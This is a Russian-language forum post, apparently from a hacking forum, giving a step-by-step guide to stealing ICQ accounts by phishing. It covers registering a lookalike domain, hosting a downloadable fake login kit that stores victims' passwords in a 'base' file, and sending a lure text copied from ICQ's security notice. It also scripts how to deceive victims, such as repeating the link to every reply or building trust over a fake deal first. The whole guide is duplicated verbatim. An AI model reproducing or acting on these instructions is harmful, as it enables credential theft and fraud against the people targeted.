Vladimir
Опытный user
- Регистрация
- 26 Фев 2016
- Сообщения
- 45
- Реакции
- 22
Забирать аккаунты icq мы будем с помощью фейка. Вот последовательность:
1) Регистрируем хостинг и домен. Домен регистрируем вида:
https://www.icq.com/659653029/antispam?sc=00946009https://www.icq.com/659653029/antispam?sc=00946009
(например используют такую: http://icq.ru.com/icq/validate.html?uid=659653029&sid=00946009&lang=en). Т.е. регистрируем домен, похожий на https://www.icq.com
2)Открываем папочку с файликами и заносим на хостинг.
3)В файле base будут находиться логины и пароли от уведенных нами асек.
4)Нам необходимо, чтобы жертва перешла по нашей ссылке, она будет вида: ваш домен/icq/validate.html?uid=659653029&sid=00946009&lang=en. Там она введет свой логин и пароль – и соответственно этот логин и пароль мы сможем увидеть в файлике base на нашем хостинге.
5)Как мы это будем делать? Известно, что ссылка http://icq.com/icq/validate.html?uid=659653029&sid=00946009&lang=en поступает пользователю, если у него превышен лимит сообщений, жалобах о спаме. Вместе с такой ссылкой пользователю поступает текст: «As a security precaution, please click the link to verify your ICQ account». Т.е. общий вид сообщения, которое мы кидаем пользователю: As a security precaution, please click the link to verify your ICQ account домен/icq/validate.html?uid=659653029&sid=00946009&lang=en
6)Когда мы кидаем это сообщение пользователю? Можем с самого начала сообщения – пишем жертве «Привет», он отвечает и мы ему в ответку сразу: As a security precaution, please click the link to verify your ICQ account домен/icq/validate.html?uid=659653029&sid=00946009&lang=en. Пользователь пишет что-то типо «что это?», вы ему снова ссылку кидаете и так каждый раз в ответ на любое его сообщение. Как только он переходит по ссылке и вводит свои данные (периодически обновляем файлик base) мы уже отвечаем нормально она его сообщения (а его старые сообщения мы типо не видим).
7)Мы можем начать кидать такую ссылку с фразой в середине нашего разговора с жертвой. Самое главное не показывать, что мы видим его сообщения. Самое главное заставить пользователя перейти по ссылке. Например можно с самого начала норм общаться, договариваться о какой-то сделке – потом написать, что отойду на 5 минут и зайду с телефона – и уже тогда использовать фразу и ссылку (через пять минут).
Скачать фейк: https://www.sendspace.com/file/z3iv6n
1) Регистрируем хостинг и домен. Домен регистрируем вида:
https://www.icq.com/659653029/antispam?sc=00946009https://www.icq.com/659653029/antispam?sc=00946009
(например используют такую: http://icq.ru.com/icq/validate.html?uid=659653029&sid=00946009&lang=en). Т.е. регистрируем домен, похожий на https://www.icq.com
2)Открываем папочку с файликами и заносим на хостинг.
3)В файле base будут находиться логины и пароли от уведенных нами асек.
4)Нам необходимо, чтобы жертва перешла по нашей ссылке, она будет вида: ваш домен/icq/validate.html?uid=659653029&sid=00946009&lang=en. Там она введет свой логин и пароль – и соответственно этот логин и пароль мы сможем увидеть в файлике base на нашем хостинге.
5)Как мы это будем делать? Известно, что ссылка http://icq.com/icq/validate.html?uid=659653029&sid=00946009&lang=en поступает пользователю, если у него превышен лимит сообщений, жалобах о спаме. Вместе с такой ссылкой пользователю поступает текст: «As a security precaution, please click the link to verify your ICQ account». Т.е. общий вид сообщения, которое мы кидаем пользователю: As a security precaution, please click the link to verify your ICQ account домен/icq/validate.html?uid=659653029&sid=00946009&lang=en
6)Когда мы кидаем это сообщение пользователю? Можем с самого начала сообщения – пишем жертве «Привет», он отвечает и мы ему в ответку сразу: As a security precaution, please click the link to verify your ICQ account домен/icq/validate.html?uid=659653029&sid=00946009&lang=en. Пользователь пишет что-то типо «что это?», вы ему снова ссылку кидаете и так каждый раз в ответ на любое его сообщение. Как только он переходит по ссылке и вводит свои данные (периодически обновляем файлик base) мы уже отвечаем нормально она его сообщения (а его старые сообщения мы типо не видим).
7)Мы можем начать кидать такую ссылку с фразой в середине нашего разговора с жертвой. Самое главное не показывать, что мы видим его сообщения. Самое главное заставить пользователя перейти по ссылке. Например можно с самого начала норм общаться, договариваться о какой-то сделке – потом написать, что отойду на 5 минут и зайду с телефона – и уже тогда использовать фразу и ссылку (через пять минут).
Скачать фейк: https://www.sendspace.com/file/z3iv6n